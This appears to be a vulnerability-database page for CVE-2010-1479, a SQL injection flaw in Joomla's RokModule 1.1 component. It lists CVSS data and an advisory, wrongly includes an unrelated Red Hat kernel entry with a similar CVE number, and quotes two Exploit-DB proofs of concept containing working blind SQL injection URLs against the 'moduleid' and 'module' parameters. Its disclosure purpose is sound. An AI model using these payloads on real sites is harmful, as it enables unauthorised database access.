CVE-2010-1479
published 2010-04-19CVE-2010-1479: SQL injection vulnerability in the RokModule (com_rokmodule) component 1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the…
PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.31%
81.2th percentile
SQL injection vulnerability in the RokModule (com_rokmodule) component 1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the moduleid parameter in a raw action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rockettheme | com_rokmodule | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat4.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f7qx-6327-qgwq: SQL injection vulnerability in the RokModule (com_rokmodule) component 1
ghsa_unreviewed·2022-05-17
CVE-2010-1479 [HIGH] CWE-89 GHSA-f7qx-6327-qgwq: SQL injection vulnerability in the RokModule (com_rokmodule) component 1
SQL injection vulnerability in the RokModule (com_rokmodule) component 1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the moduleid parameter in a raw action to index.php.
Red Hat
kernel: DoS (crash) due slab corruption in inotify_init1 (incomplete fix for CVE-2010-4250)
vendor_redhat·2011-04-05·CVSS 4.9
CVE-2011-1479 [MEDIUM] kernel: DoS (crash) due slab corruption in inotify_init1 (incomplete fix for CVE-2010-4250)
kernel: DoS (crash) due slab corruption in inotify_init1 (incomplete fix for CVE-2010-4250)
Double free vulnerability in the inotify subsystem in the Linux kernel before 2.6.39 allows local users to cause a denial of service (system crash) via vectors involving failed attempts to create files. NOTE: this vulnerability exists because of an incorrect fix for CVE-2010-4250.
Statement: This issue did not affect the versions of Linux kernel as shipped with Red Hat
Enterprise Linux 4 and 5. This has been addressed in Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG via https://rhn.redhat.com/errata/RHSA-2011-0498.html and https://rhn.redhat.com/errata/RHSA-2011-1253.html.
Package: kernel (Red Hat Enterprise Linux 6) - Affected
Package: kernel (Red Hat Enterprise Linux Extended Update Su
No detection rules found.
Exploit-DB
Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
exploitdb·2012-09-10
CVE-2010-1480 Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection
---
Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability
Nombre del Componente: Com_rokmodule
Empresa: http://www.rockettheme.com/
Testeado: Linux Backtrack
Autor: Yarolinux Para WebSecurityDev
Twitter: @Yarolinux
Fecha: 09/09/2012
Bueno la Injeccion Va de la siguiente manera:
http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]
http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]
Ok! Eso es todo Difrutenlo!
Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy
pronto resultados :D
Greetz: Dylan Irzi & WebSecurityDev
Exploit-DB
Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
exploitdb·2010-04-11
CVE-2010-1480 Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection
---
[o] Joomla Component RokModule Blind SQLi [moduleid] Vulnerability
Software : com_rokmodule version 1.1
Vendor : http://www.rockettheme.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=[BSQLi]
[o] PoC
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true
http://localhost/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false
[o] Greetz
http://packetstormsecurity.org/1004-exploits/joomlarokmodule-bsql.txthttp://secunia.com/advisories/39255http://www.exploit-db.com/exploits/12148http://www.rockettheme.com/extensions-downloads/free/rokmodule/1040-rokmodule-component/downloadhttp://www.rockettheme.com/extensions-updates/673-rokmodule-security-update-releasedhttp://www.securityfocus.com/bid/39378http://packetstormsecurity.org/1004-exploits/joomlarokmodule-bsql.txthttp://secunia.com/advisories/39255http://www.exploit-db.com/exploits/12148http://www.rockettheme.com/extensions-downloads/free/rokmodule/1040-rokmodule-component/downloadhttp://www.rockettheme.com/extensions-updates/673-rokmodule-security-update-releasedhttp://www.securityfocus.com/bid/39378
2010-04-19
Published